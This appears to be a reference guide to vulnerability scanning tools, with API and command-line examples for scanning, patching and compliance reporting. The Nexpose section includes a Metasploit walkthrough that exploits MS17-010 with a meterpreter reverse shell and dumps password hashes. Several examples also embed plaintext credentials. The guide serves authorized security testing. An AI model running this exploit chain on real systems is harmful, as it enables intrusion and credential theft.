In-Depth Technical Reference & Use Case Demonstrations
Introduction
This reference document provides in-depth technical descriptions, architectural overviews, key feature analyses, and practical use-case demonstrations for 20 cybersecurity tools spanning two critical security domains: Vulnerability Scanning (Tools 31–40) and Password Management (Tools 41–50). Each tool profile includes specific command-line examples, API calls, configuration excerpts, realistic enterprise scenarios, and documented outcomes — enabling security practitioners to understand both what each tool does and precisely how it is applied in real-world environments.
The tools covered represent the most widely deployed and independently evaluated solutions in their respective categories, ranging from open-source platforms with global community adoption to commercial enterprise products with dedicated vendor support. Command examples use realistic IP addressing, naming conventions, API structures, and operational parameters consistent with production deployment patterns.
Section 1: Vulnerability Scanning
This section covers 10 vulnerability scanning tools (Tools 31–40), providing comprehensive technical analysis and practical use-case demonstrations for each product across the capability spectrum from open-source community solutions to commercial enterprise platforms.
Overview
Nessus, developed by Tenable, is the world’s most widely deployed vulnerability scanner, trusted by more than 30,000 organisations globally and performing over two million downloads. Originally launched as an open-source project in 1998 by Renaud Deraison and commercialised by Tenable in 2005, Nessus performs both credentialed and uncredentialed assessments against an 80,000-plus plugin library that is updated every day. Coverage spans servers, workstations, network devices, cloud instances, OT/SCADA systems, web applications, and mobile devices, with every plugin mapped to CVE identifiers and CVSS v3 base scores.
Nessus operates through a plugin architecture — each plugin is a small, targeted security test for a specific CVE, configuration issue, or default-credential check. Plugins are grouped into families (Windows, Unix, Web Applications, Databases, SCADA, etc.) and can be individually enabled or disabled. The standalone Nessus Professional is the per-scanner product; Tenable.io (cloud) and Tenable.sc (on-premises) scale the same engine across enterprise environments, adding asset management, VPR (Vulnerability Priority Rating), and continuous assessment. Tenable Lumin extends the platform with cyber-exposure scoring for CISO-level risk communication.
Key Features & Components
| Feature / Component | Description |
|---|---|
| 80,000+ Daily-Updated Plugins | Comprehensive CVE, configuration, and compliance coverage — updated every day from Tenable Research’s threat intelligence and CVE disclosures. |
| Credentialed (Authenticated) Scanning | Authenticates to targets via SSH, WMI/SMB, SNMP, ESXi, or database credentials — finding vulnerabilities invisible to network-only scanning (missing patches, local misconfigurations, installed software versions). |
| Vulnerability Priority Rating (VPR) | Tenable’s risk model combining CVSS base score, exploit availability (Metasploit, ExploitDB, CANVAS), threat intelligence, and asset exposure to produce a real-world exploitability score from 0–10. |
| Compliance & Configuration Auditing | Evaluates system configurations against CIS Benchmarks, DISA STIGs, PCI DSS, HIPAA, NIST 800-53, SOX, and ISO 27001 — producing pass/fail results per control with remediation guidance. |
| Web Application Scanning | Detects OWASP Top 10 vulnerabilities including SQL injection, cross-site scripting, broken authentication, security misconfigurations, and exposed sensitive data in web applications. |
| Nessus REST API | Programmatic scan management: create, schedule, launch, and export scans; retrieve results; and integrate with Splunk, ServiceNow, Jira, and CI/CD pipelines via JSON responses. |
Use Case Demonstration
# ── STEP 1 Create an authenticated scan via the Nessus API ──────────────────
curl -sk -X POST 'https://localhost:8834/scans' \
-H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
-H 'Content-Type: application/json' \
-d '{
"uuid": "ab4bacd2-05d6-44c3-9d7e-af9a2a8d9f28",
"settings": {
"name": "DataCenter_Q2_Credentialed",
"text_targets": "192.168.10.0/24",
"credentials": {
"add": {
"Host": {
"SSH": [{"username":"scanner","auth_method":"private_key",
"private_key":"[BASE64_KEY]"}],
"Windows": [{"username":"DOMAIN\\scan_svc",
"password":"P@ss2024!"}]
}
}
}
}
}'
# ── STEP 2 Launch the scan ───────────────────────────────────────────────────
curl -sk -X POST 'https://localhost:8834/scans/SCAN_ID/launch' \
-H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY'
# ── STEP 3 Poll status until completed ──────────────────────────────────────
curl -sk 'https://localhost:8834/scans/SCAN_ID' \
-H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
| python3 -c "import sys,json; d=json.load(sys.stdin)
print(d['info']['status'])"
# ── STEP 4 Export CSV filtered to Critical / High (severity >= 3) ───────────
curl -sk -X POST 'https://localhost:8834/scans/SCAN_ID/export' \
-H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
-H 'Content-Type: application/json' \
-d '{"format":"csv","filters":[{"quality":"gte",
"filter":"severity","value":"3"}]}'
# ── STEP 5 Sort by VPR descending — surface top 10 ──────────────────────────
curl -sk 'https://localhost:8834/scans/SCAN_ID/vulnerabilities' \
-H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
| python3 -c "
import sys, json
vulns = json.load(sys.stdin)['vulnerabilities']
top10 = sorted(vulns, key=lambda v: v.get('vpr_score', 0), reverse=True)[:10]
for v in top10:
print(v['plugin_name'], '| VPR:', v.get('vpr_score','N/A'))"
# ── STEP 6 Download the PDF report for the CISO ─────────────────────────────
curl -sk 'https://localhost:8834/scans/SCAN_ID/export/TOKEN/download' \
-H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' -o DataCenter_Q2.pdf
Overview
QualysGuard — now marketed as Qualys VMDR (Vulnerability Management, Detection and Response) — is a cloud-native vulnerability management platform that eliminates on-premises scanner infrastructure through 50-plus globally distributed cloud platforms and a lightweight 4-MB cloud agent. Qualys maintains a database of more than 150,000 QIDs (Qualys Vulnerability IDs) and aggregates threat intelligence from 25-plus commercial and open-source feeds. The platform supports agentless scanning via virtual scanner appliances, external scanning via Qualys-hosted scanners, passive network monitoring, and API connectors for AWS, Azure, and GCP.
Qualys VMDR’s TruRisk scoring model is its principal differentiator — combining CVSS base score, temporal score (exploit maturity and remediation availability), threat actor activity gleaned from dark-web and criminal forums, business asset criticality, and environmental exposure into a single prioritised risk score. The AssetView module delivers a continuously refreshed, queryable asset inventory across on-premises, cloud, and container environments. Qualys Patch Management integrates natively with VMDR to close the detection-to-remediation loop by deploying missing patches directly from the same console that identified them.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Qualys Cloud Agent (4 MB) | Continuous on-agent vulnerability assessment without network reachability — covering roaming laptops, cloud VMs, and air-gapped systems; results stream to the cloud in real time. |
| TruRisk Scoring | Prioritises vulnerabilities using CVSS, exploit maturity, threat-actor activity (dark web monitoring), asset business criticality, and network exposure — not CVSS alone. |
| AssetView (Real-Time Inventory) | Continuously updated, queryable asset inventory across on-premises and cloud environments using QQL (Qualys Query Language) for instant ad-hoc searches. |
| VMDR Workflow Automation | End-to-end orchestration: detect vulnerability → TruRisk-score → open Jira/ServiceNow ticket → deploy patch via Qualys PM → verify remediation — all within one platform. |
| Container Security (CS) | Scans Docker and OCI images in CI/CD pipelines and cloud registries (ECR, GCR, ACR) for OS-level and application-layer vulnerabilities before container deployment. |
| Qualys TotalCloud (CSPM) | Cloud Security Posture Management and CNAPP for AWS, Azure, and GCP — detecting IAM misconfigurations, public S3 buckets, unencrypted volumes, and compliance violations. |
Use Case Demonstration
# ── STEP 1 Find all assets with Log4j QID 374145 ────────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' \
'https://qualysapi.qualys.com/qps/rest/2.0/search/am/hostasset' \
-d '<?xml version="1.0"?>
<ServiceRequest>
<filters>
<Criteria field="vuln.qid" operator="EQUALS">374145</Criteria>
</filters>
<preferences><limitResults>2500</limitResults></preferences>
</ServiceRequest>'
# ── STEP 2 Count affected assets ─────────────────────────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' \
'https://qualysapi.qualys.com/asset/v1/count/am/asset' \
-d '{"filters":[{"field":"vulnerability.qid",
"operator":"EQUALS","value":"374145"}]}'
# Response: {"count": 287} — 287 vulnerable assets found
# ── STEP 3 Tag vulnerable assets for targeted re-scan ───────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
'https://qualysapi.qualys.com/qps/rest/2.0/create/am/tag' \
-d '<?xml version="1.0"?>
<ServiceRequest><data><Tag>
<name>Log4Shell_Affected</name>
<ruleType>GROOVY</ruleType>
<ruleText>
return asset.openPort.find{p->p.vulnerabilities.find{
v->v.qid==374145}}!=null
</ruleText>
</Tag></data></ServiceRequest>'
# ── STEP 4 Launch emergency scan against tagged assets ───────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
'https://qualysapi.qualys.com/api/2.0/fo/scan/?action=launch' \
-d 'scan_title=Log4Shell_Emergency&option_id=1
&target_from=tags&tag_include_selector=any
&use_ip_nt_range_tags_include=1&tag_set_include=Log4Shell_Affected'
# ── STEP 5 Deploy Log4j 2.17.1 patch via Qualys PM ──────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
'https://qualysapi.qualys.com/qps/rest/1.0/launch/pm/job/' \
-d '{"name":"Log4j_Emergency_Patch","tagIds":[TAG_ID],
"patches":[{"qid":374145}],"deploymentType":"IMMEDIATE"}'
# ── STEP 6 Verify remediation via a follow-up scan ───────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
'https://qualysapi.qualys.com/api/2.0/fo/scan/?action=launch' \
-d 'scan_title=Log4Shell_Verify&option_id=1
&target_from=tags&tag_set_include=Log4Shell_Affected'
Overview
Acunetix, developed by Invicti Security (after the merger of Acunetix and Netsparker), is a specialised automated web application security scanner combining a DeepScan AJAX-rendering crawler, a signature-based vulnerability engine, behavioural analysis, and out-of-band detection through the AcuMonitor platform. Acunetix detects more than 7,000 web application vulnerability classes — including all SQL injection variants (error-based, boolean-blind, time-based, union-select, out-of-band), stored and reflected XSS, DOM-based XSS, SSRF, XXE, path traversal, SSTI, open redirects, weak TLS configurations, and framework-specific flaws in WordPress, Drupal, Laravel, and Django.
Acunetix’s DeepScan engine uses a built-in Chromium-based browser that fully renders JavaScript-heavy single-page applications, making it effective against modern React, Angular, and Vue.js frontends where traditional crawlers miss most of the attack surface. The optional AcuSensor IAST component is an in-process sensor for .NET, PHP, Java, and Node.js that provides exact file-and-line-number vulnerability location, eliminates false positives by confirming execution paths, and detects vulnerabilities that purely black-box DAST cannot find. The REST API enables complete programmatic control for CI/CD pipeline integration across Jenkins, GitLab, GitHub Actions, and Azure DevOps.
Key Features & Components
| Feature / Component | Description |
|---|---|
| DeepScan AJAX Crawler | Chromium-based JavaScript rendering engine that discovers endpoints, form submissions, API calls, and hidden parameters in SPA frameworks invisible to traditional crawlers. |
| AcuSensor (IAST) | In-process sensor for .NET, PHP, Java, and Node.js — provides exact file and line number for each vulnerability, eliminates false positives by confirming execution paths. |
| AcuMonitor (OOB Detection) | Out-of-band detection infrastructure confirming blind SQL injection, blind XSS, blind SSRF, and XXE via DNS and HTTP callbacks — no response modification needed. |
| Network Vulnerability Scanner | Scans the web server host for 50,000-plus network-level vulnerabilities (open ports, outdated service versions, missing OS patches) alongside the web application test. |
| CI/CD Pipeline Integration | REST API plus official plugins for Jenkins, GitLab CI, GitHub Actions, TeamCity, Bamboo, and Azure DevOps — DAST as a mandatory pipeline gate on every merge request. |
| Compliance Reporting | Pre-built reports for OWASP Top 10, PCI DSS 4.0, HIPAA, GDPR, ISO 27001, NIST 800-53, and SOC 2 — each finding mapped to the specific control requirement. |
Use Case Demonstration
# ── .gitlab-ci.yml — Acunetix DAST security stage ────────────────────────────
acunetix_dast:
stage: security
only: [merge_requests]
variables:
TARGET_URL: 'https://staging.finapp.corp.internal'
script:
# Step 1: Create scan target
- |
TARGET_ID=$(curl -sk -X POST https://acx.corp.local:3443/api/v1/targets \
-H 'X-Auth: '$ACUNETIX_API_KEY \
-H 'Content-Type: application/json' \
-d '{"address":"'$TARGET_URL'","description":"MR #'$CI_MERGE_REQUEST_IID'"}' \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["target_id"])')
# Step 2: Launch full scan with 'Full Scan' profile
- |
SCAN_ID=$(curl -sk -X POST https://acx.corp.local:3443/api/v1/scans \
-H 'X-Auth: '$ACUNETIX_API_KEY \
-H 'Content-Type: application/json' \
-d '{"target_id":"'$TARGET_ID'",
"profile_id":"11111111-1111-1111-1111-111111111111"}' \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["scan_id"])')
# Step 3: Poll until completed
- |
while true; do
STATUS=$(curl -sk https://acx.corp.local:3443/api/v1/scans/$SCAN_ID \
-H 'X-Auth: '$ACUNETIX_API_KEY \
| python3 -c 'import sys,json
print(json.load(sys.stdin)["current_session"]["status"])')
[ "$STATUS" = 'completed' ] && break
sleep 30
done
# Step 4: Count Critical + High — fail pipeline if any exist
- |
CRIT=$(curl -sk \
"https://acx.corp.local:3443/api/v1/vulnerabilities?target_id=$TARGET_ID&severity=critical" \
-H 'X-Auth: '$ACUNETIX_API_KEY \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["pagination"]["count"])')
HIGH=$(curl -sk \
"https://acx.corp.local:3443/api/v1/vulnerabilities?target_id=$TARGET_ID&severity=high" \
-H 'X-Auth: '$ACUNETIX_API_KEY \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["pagination"]["count"])')
echo "Critical=$CRIT High=$HIGH"
if [ $((CRIT + HIGH)) -gt 0 ]; then
echo 'PIPELINE BLOCKED — security vulnerabilities detected'
exit 1
fi
Overview
Rapid7 InsightVM is the cloud-native evolution of Rapid7’s vulnerability management platform, integrating tightly with the broader Rapid7 Insight cloud ecosystem — InsightIDR (SIEM and EDR), InsightAppSec (DAST), InsightConnect (SOAR), and InsightCloudSec (CSPM). InsightVM performs network-based authenticated scanning through distributed Scan Engines and continuous local assessment through the lightweight InsightAgent (under 5 MB). Results from both data sources converge in cloud-hosted dashboards that refresh in near-real time.
InsightVM’s operational approach focuses on bridging the gap between security and IT operations teams. The Live Dashboard refreshes vulnerability counts and risk scores continuously as scan data arrives — no more weekly or monthly report cycles. The Remediation Projects feature creates tracked, assigned remediation tasks for specific vulnerability groups, with SLAs, progress graphs, and automatic closure verification when patching is confirmed by a subsequent scan. Real Risk Score (1–1000) incorporates CVSS, exploit availability, Rapid7 threat intelligence, malware exposure, and asset criticality, ensuring the most actionable vulnerabilities surface first.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Live Dashboards (Near Real-Time) | Risk score, vulnerability counts, remediation velocity, new asset discovery, and compliance posture updated continuously as scan engines and agents report in. |
| Remediation Projects | Assigns specific CVE groups to IT team owners with due-date SLAs, progress tracking, ownership transparency, and automated verification upon patch confirmation. |
| InsightAgent (<5 MB) | Continuous local vulnerability assessment on roaming laptops, cloud VMs, containers, and systems unreachable by network scanning — telemetry streams to InsightVM cloud. |
| Real Risk Score (1–1000) | Combines CVSS score, exploit availability, Rapid7 Metasploit and dark-web intelligence, malware exposure, and asset criticality weighting into one prioritised score. |
| Container Assessment | Scans Docker and OCI images in CI/CD pipelines and cloud registries for OS and application vulnerabilities before container images are deployed. |
| InsightVM v3 REST API | Full programmatic management of sites, scan engines, scan schedules, asset queries, vulnerability results, and remediation project data for SIEM and SOAR integration. |
Use Case Demonstration
# ── STEP 1 Query all Critical Windows vulnerabilities ───────────────────────
curl -sk -u 'admin:P@ssw0rd' \
'https://insightvm.corp.local:3780/api/3/vulnerabilities?
severity=Critical&filter=os%3AWindows&size=200' \
| python3 -c "
import sys, json
data = json.load(sys.stdin)
vulns = data['resources']
print(f'Total Critical Windows vulns: {len(vulns)}')
for v in vulns[:5]:
score = v.get('cvss_v3',{}).get('score','N/A')
print(f' {v[\"id\"]}: {v[\"title\"]} | CVSS: {score}')"
# ── STEP 2 Create the Remediation Project ────────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' -X POST \
'https://insightvm.corp.local:3780/api/3/solution_groups' \
-H 'Content-Type: application/json' \
-d '{
"name": "Windows_Critical_Jun2024",
"description": "30-day SLA — Critical Windows patch cycle",
"owner": "win-patching@corp.com",
"due_date": "2024-06-17T00:00:00Z",
"vulnerabilities": ["cve-2024-21338","cve-2024-21345","cve-2024-20664"]
}'
# ── STEP 3 Check project progress ────────────────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' \
'https://insightvm.corp.local:3780/api/3/solution_groups/PROJECT_ID/progress'
# {"total":247,"remediated":189,"in_progress":34,"overdue":24}
# ── STEP 4 Generate PDF progress report ──────────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' -X POST \
'https://insightvm.corp.local:3780/api/3/reports' \
-H 'Content-Type: application/json' \
-d '{
"name": "Windows_Patch_Progress",
"format": "pdf",
"template":"audit-report",
"scope": {"solution_group_ids":["PROJECT_ID"]}
}'
# ── STEP 5 Trigger verification re-scan on patched hosts ─────────────────────
curl -sk -u 'admin:P@ssw0rd' -X POST \
'https://insightvm.corp.local:3780/api/3/sites/SITE_ID/scans' \
-H 'Content-Type: application/json' \
-d '{"hosts":["192.168.10.0/24"]}'
# ── STEP 6 Identify hosts that missed the SLA ────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' \
'https://insightvm.corp.local:3780/api/3/solution_groups/PROJECT_ID/progress' \
| python3 -c "
import sys, json
p = json.load(sys.stdin)
print(f'Overdue assets: {p[\"overdue\"]} — escalating to team managers')"
Overview
BeyondTrust Retina Network Security Scanner — originally developed by eEye Digital Security and acquired by BeyondTrust in 2012 — is an enterprise vulnerability scanner distinguished by its low-impact scanning methodology, native integration with BeyondTrust Privileged Access Management (PAM), and broad coverage of network infrastructure, databases, and OT/ICS environments. Retina performs credentialed and uncredentialed assessments, checking for software vulnerabilities, dangerous misconfigurations, missing patches, default credentials, and compliance deviations across Windows, Linux, network devices, and industrial control systems.
Retina’s most operationally significant differentiator is its integration with BeyondTrust Password Safe. Instead of storing scanner credentials inside the scan configuration — a common and exploitable risk pattern — Retina dynamically checks credentials out of Password Safe for the duration of each scan, uses them, and returns them immediately upon completion. Every credential check-out and check-in is logged in Password Safe’s immutable audit trail. This eliminates the attack surface of a compromised scanner credential store and satisfies PAM compliance requirements for privileged access governance in regulated industries including healthcare, financial services, and energy.
Key Features & Components
| Feature / Component | Description |
|---|---|
| BeyondTrust Password Safe Integration | Dynamically checks credentials out of Password Safe for scan duration and returns them upon completion — eliminating stored scanner credentials with a full privileged access audit trail. |
| Zero-Impact Scanning Profile | Purpose-built low-bandwidth scan profiles for production OT, healthcare clinical networks, and high-availability environments — avoids service disruption on sensitive targets. |
| Database Vulnerability Assessment | Credentialed scanning of MSSQL, Oracle, MySQL, PostgreSQL, and DB2 — checking for privilege escalation paths, weak accounts, unpatched versions, and insecure configurations. |
| Wireless Assessment | Detects rogue wireless access points, weak WEP/WPA configurations, and unauthorised wireless devices attempting to bridge into the wired corporate network. |
| BeyondInsight Platform Integration | Correlates Retina scan findings with BeyondInsight’s unified identity and privileged-access management data for risk-based prioritisation and automated remediation workflows. |
| HIPAA / DISA STIG Compliance Reports | Pre-built compliance report templates mapping each finding to HIPAA Security Rule controls, DISA STIG IDs, PCI DSS requirements, and CIS Benchmark controls. |
Use Case Demonstration
# ── STEP 1 Check out scanner credentials from Password Safe ─────────────────
curl -X POST \
'https://ps.hospital.local/BeyondTrust/api/public/v3/requests/requestId' \
-H 'Authorization: PS-Auth key=[API_KEY];runas=scan_svc' \
-H 'Content-Type: application/json' \
-d '{"SystemName":"Windows-Domain-Scanner","AccountName":"scan_svc",
"DurationMinutes":120,"Reason":"Q2 Vulnerability Assessment",
"ConflictOption":"reuse"}'
# Response: {"RequestID":4521, "Credentials":"TmpPass#94Xq!", ...}
# ── STEP 2 Configure Retina scan using checked-out credential ────────────────
# Retina CS Console > Scans > New Audit
# Targets: 172.16.50.0/24 (clinical) 172.16.51.0/24 (EHR servers)
# Scan Profile: Healthcare_LowImpact (rate-limited, reduced threads)
# Credentials — Windows: HOSPITAL\scan_svc / [Password Safe temp password]
# Credentials — SSH: scan_svc / [Password Safe SSH key]
# ── STEP 3 Run scan from Retina command line ──────────────────────────────────
RetinaCL.exe /scan \
/profile:Healthcare_LowImpact \
/range:172.16.50.0/24,172.16.51.0/24 \
/credential:windows:HOSPITAL\scan_svc:[TEMP_PASS] \
/output:C:\Scans\Clinical_Q2_2024.rtd \
/log:C:\Scans\scan_log.txt
# ── STEP 4 Generate HIPAA compliance report ──────────────────────────────────
RetinaCL.exe /report \
/input:C:\Scans\Clinical_Q2_2024.rtd \
/template:HIPAA_Security_Rule \
/format:pdf \
/output:C:\Reports\HIPAA_Q2_2024.pdf
# ── STEP 5 Return credentials to Password Safe ───────────────────────────────
curl -X PUT \
'https://ps.hospital.local/BeyondTrust/api/public/v3/requests/4521/checkin' \
-H 'Authorization: PS-Auth key=[API_KEY];runas=scan_svc'
Overview
GFI LanGuard is a network vulnerability scanner and integrated patch management platform designed for SMB and mid-market organisations that need a single product covering vulnerability assessment, patch deployment, software auditing, network discovery, and compliance reporting — without the complexity and cost of enterprise platforms. LanGuard auto-discovers network assets, performs credentialed vulnerability scanning against Microsoft, Linux, and macOS systems, identifies missing patches across the OS and 60-plus third-party applications (Adobe, Java, Firefox, Chrome, VLC, 7-Zip, etc.), and deploys remediation through built-in patch management.
GFI LanGuard is particularly valuable for resource-constrained IT teams because it consolidates functions that would otherwise require separate tools: a vulnerability scanner comparable to Nessus for SMB scale, an integrated patch management capability comparable to WSUS for third-party apps, a software asset inventory comparable to SCCM, and a port scanner — all managed from a single console with a scheduled scan-and-patch automation cycle. Its compliance reporting covers PCI DSS, HIPAA, SOX, ISO 27001, and NIST 800-53, with each finding mapped to the relevant control requirement.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Integrated Patch Management | Deploys missing Windows, macOS, Linux, and 60-plus third-party application patches directly from the scanner console — no separate WSUS or third-party patch product required. |
| Network & Software Auditing | Inventories all network hardware (printers, switches, routers) and installed software (licence compliance, USB device usage history, unauthorized applications) across every discovered host. |
| Virtual Machine Assessment | Scans powered-off VMware and Hyper-V virtual machines via the hypervisor API — finding vulnerabilities in offline images before they are brought into service. |
| Scheduled Scan-and-Patch Automation | Automates the complete scan → assess → patch → reboot → verify cycle on a configurable schedule — enabling continuous vulnerability remediation without manual triggers. |
| Agentless and Agent-Based Modes | Agentless scanning via WMI/SSH for zero-footprint deployment; optional agents for continuous monitoring and remote coverage of roaming endpoints. |
| Compliance Report Templates | PCI DSS, HIPAA, SOX, ISO 27001, and NIST 800-53 report templates — each finding mapped to specific control requirements with pass/fail status and remediation guidance. |
Use Case Demonstration
# ── GFI LanGuard CLI (lnsscmd.exe) — scan, patch, report ────────────────────
# Step 1: Full credentialed vulnerability scan of all endpoints
lnsscmd.exe /scan 192.168.1.0/24 \
/profile "Full Security Scan" \
/user DOMAIN\scan_svc /pwd SecureScan2024! \
/out C:\Scans\Monthly_Jun2024.xml
# Step 2: Preview which critical patches would be deployed
lnsscmd.exe /scan 192.168.1.0/24 \
/profile "Missing Patches Only" \
/user DOMAIN\scan_svc /pwd SecureScan2024! \
/out C:\Scans\PatchPreview_Jun2024.xml
# Step 3: Auto-deploy Critical and Important patches, reboot if needed
lnsscmd.exe /deploy 192.168.1.0/24 \
/patches critical,important \
/user DOMAIN\scan_svc /pwd SecureScan2024! \
/reboot ifneeded \
/log C:\Logs\patch_deploy_Jun2024.txt
# Step 4: Generate executive PDF summary
lnsscmd.exe /report 192.168.1.0/24 \
/input C:\Scans\Monthly_Jun2024.xml \
/template "Executive Summary" \
/out C:\Reports\Exec_Jun2024.pdf
# Step 5: Generate PCI DSS compliance report
lnsscmd.exe /report 192.168.1.0/24 \
/input C:\Scans\Monthly_Jun2024.xml \
/template "PCI DSS" \
/out C:\Reports\PCI_Jun2024.pdf
# Step 6: Schedule via Windows Task Scheduler (runs every 1st of month)
schtasks /create /tn "GFI_Monthly_Scan_Patch" \
/tr "\"C:\Program Files\GFI\LanGuard\lnsscmd.exe\"
/scan 192.168.1.0/24 /profile \"Full Security Scan\"
/user DOMAIN\\scan_svc /pwd SecureScan2024!
/deploy critical,important /reboot ifneeded" \
/sc monthly /d 1 /st 02:00 /ru SYSTEM
Overview
Nexpose is Rapid7’s on-premises vulnerability scanner — the predecessor to InsightVM and the scanning engine that continues to power InsightVM’s network-based assessments. While InsightVM is the cloud-managed evolution, Nexpose (delivered as the Rapid7 Security Console) remains the preferred deployment for organisations with strict data residency requirements, air-gapped environments, or regulated industries where vulnerability data cannot leave the organisation’s network. Nexpose uses a distributed scan engine architecture — multiple Scan Engines deployed across network segments report to a central Security Console that aggregates results, manages policies, and provides reporting.
Nexpose’s most distinctive capability is its native bidirectional integration with the Metasploit Framework — enabling penetration testers to import Nexpose vulnerability findings directly into Metasploit and automatically attempt exploitation of discovered vulnerabilities, validating whether each finding is genuinely exploitable in the target environment. This closed-loop between vulnerability detection and exploitation confirmation dramatically improves report accuracy and gives remediation teams confidence that prioritised findings represent real, proven risk — not theoretical scanner positives based solely on version matching.
Key Features & Components
| Feature / Component | Description |
|---|---|
| Distributed Scan Engine Architecture | Multiple Scan Engines deployed in remote sites, cloud VPCs, and DMZ segments — each scans its local network, reporting to a central Security Console with unified visibility. |
| Metasploit Bidirectional Integration | Nexpose scans populate Metasploit’s vulnerability database; successful Metasploit exploitation marks findings as ‘Validated’ in Nexpose reports — confirmed true positives. |
| Adaptive Security | Detects new assets appearing on the network and automatically assesses them — near-real-time coverage for dynamic cloud and DHCP environments without manual scan scheduling. |
| RealContext Asset Tagging | Tags assets with business metadata (criticality tier, owner, regulatory scope, environment) — weights risk scores so vulnerabilities on critical assets prioritise higher. |
| Risk Score (1–1000) | Asset-level and vulnerability-level risk scores incorporating CVSS, exploit maturity, malware exposure, and RealContext asset criticality weighting for actionable prioritisation. |
| Policy Assessment | Evaluates system configurations against CIS Benchmarks, NIST SP 800-53, PCI DSS, and DISA STIG — providing per-control pass/fail compliance posture with remediation guidance. |
Use Case Demonstration
# ── STEP 1 Run authenticated Nexpose scan via API ───────────────────────────
curl -sk -u 'admin:P@ssword' -X POST \
'https://nexpose.corp.local:3780/api/3/sites/2/scans' \
-H 'Content-Type: application/json' \
-d '{"hosts":["192.168.20.0/24"]}'
# ── STEP 2 Export results in Nexpose XML format ──────────────────────────────
curl -sk -u 'admin:P@ssword' -X POST \
'https://nexpose.corp.local:3780/api/3/reports' \
-H 'Content-Type: application/json' \
-d '{"name":"MSF_Import","format":"nexpose-simple","scope":{"sites":[2]}}'
# ── STEP 3 Import Nexpose XML into Metasploit ────────────────────────────────
msfconsole -q
msf6 > db_status
msf6 > db_import /tmp/nexpose_export.xml
msf6 > vulns -p 445 # list SMB vulnerabilities from Nexpose import
# ── STEP 4 Auto-populate RHOSTS and exploit MS17-010 ────────────────────────
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > hosts -R # RHOSTS from Nexpose-identified vulnerable hosts
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > set LHOST 192.168.20.200
msf6 exploit(...) > exploit
# ── STEP 5 Post-exploitation — confirm SYSTEM access ────────────────────────
meterpreter > getuid # Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump # Administrator:500:aad3...:::
# ── STEP 6 Mark validated vulnerabilities in Nexpose ────────────────────────
# Nexpose Console > Asset > Vulnerability > Mark as 'Confirmed Exploited'
# These receive highest priority in remediation reporting
# ── STEP 7 Query risk score of validated vs. unvalidated ────────────────────
curl -sk -u 'admin:P@ssword' \
'https://nexpose.corp.local:3780/api/3/assets?
filter=vuln.title%3DMS17-010&size=50'
Overview
OpenSCAP is an open-source implementation of the SCAP (Security Content Automation Protocol) standard — a suite of NIST-defined specifications including XCCDF (eXtensible Configuration Checklist Description Format), OVAL (Open Vulnerability and Assessment Language), CVE, CVSS, and CPE. OpenSCAP enables automated security compliance assessment, vulnerability scanning, and configuration auditing against standardised security baselines. It is used extensively in government, defence, and regulated industry environments where compliance with specific published security standards — DISA STIG, CIS Benchmark, NIST 800-53, PCI DSS — must be formally demonstrated and audited.
The SCAP Security Guide (SSG) — the primary content source for OpenSCAP — provides continuously maintained XCCDF profiles for RHEL, CentOS Stream, Ubuntu, Debian, Fedora, SLES, and other Linux distributions, covering DISA STIG, CIS Benchmark Level 1/2, NIST 800-53, PCI DSS, HIPAA, and the Australian Essential Eight baselines. OpenSCAP’s most powerful operational capability is its Ansible remediation playbook generation — after a compliance scan, OpenSCAP generates a fully populated Ansible playbook that automatically remediates every failing control it identified, providing Infrastructure as Code security compliance at scale.
Key Features & Components
| Feature / Component | Description |
|---|---|
| XCCDF Compliance Scanning | Evaluates system configurations against XCCDF profiles — providing pass/fail status for every security control with CCE reference, severity, and remediation guidance. |
| OVAL Vulnerability Detection | CVE-based vulnerability checking using installed package version data — determines if a system is patched against specific CVEs without running active network probes. |
| SCAP Security Guide (20+ Distros) | Community-maintained XCCDF content for RHEL, Ubuntu, Debian, Fedora, SLES, and others — covering DISA STIG, CIS, NIST 800-53, PCI DSS, and HIPAA profiles. |
| Ansible Remediation Generation | Generates Ansible playbooks from failing scan results — automatically remediating non-compliant controls through Infrastructure as Code deployment. |
| HTML & ARF Reports | Detailed HTML compliance reports with overall percentage score, per-control pass/fail, CCE and CVE references, and control-level remediation guidance. |
| Remote SSH Scanning (oscap-ssh) | Scans remote systems over SSH without installing OpenSCAP on the target — agentless compliance assessment for environments where agent installation is restricted. |
Use Case Demonstration
# ── STEP 1 Install OpenSCAP and SCAP Security Guide ─────────────────────────
sudo dnf install -y openscap-scanner scap-security-guide
# List available RHEL 9 DISA STIG profiles
oscap info /usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml \
| grep 'Title:' | grep -i stig
# ── STEP 2 Run DISA STIG compliance assessment ───────────────────────────────
sudo oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_stig \
--results-arf /tmp/stig_results.xml \
--report /tmp/stig_report.html \
--oval-results \
/usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml
# Show overall compliance score
grep -oP 'score.*?[0-9.]+' /tmp/stig_report.html | head -1
# ── STEP 3 Remote scan a server without installing OpenSCAP on it ───────────
oscap-ssh root@appserver-01.corp.local 22 xccdf eval \
--profile xccdf_org.ssgproject.content_profile_stig \
